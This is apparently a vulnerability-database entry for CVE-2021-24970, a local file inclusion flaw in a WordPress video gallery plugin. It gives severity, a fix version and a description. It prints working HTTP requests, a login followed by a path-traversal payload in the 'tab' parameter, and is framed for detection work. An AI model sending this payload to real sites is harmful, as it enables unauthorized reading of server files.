🔙 목록으로 돌아가기

CVE-2021-24970: WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion

TitleWordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion
Authorr3Y3r53
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationFixed in version 2.5.4.
CVSS Score7.2
EPSS Score0.19736
CVE IDCVE-2021-24970
CWE IDCWE-22
Tags cve2021 cve wpscan wp wp-plugin wordpress lfi authenticated plugins360 vuln

🔍 Vulnerability Description

WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=wKPpFl&pwd=fyW8xI&wp-submit=Log+In
GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24970.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24970.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A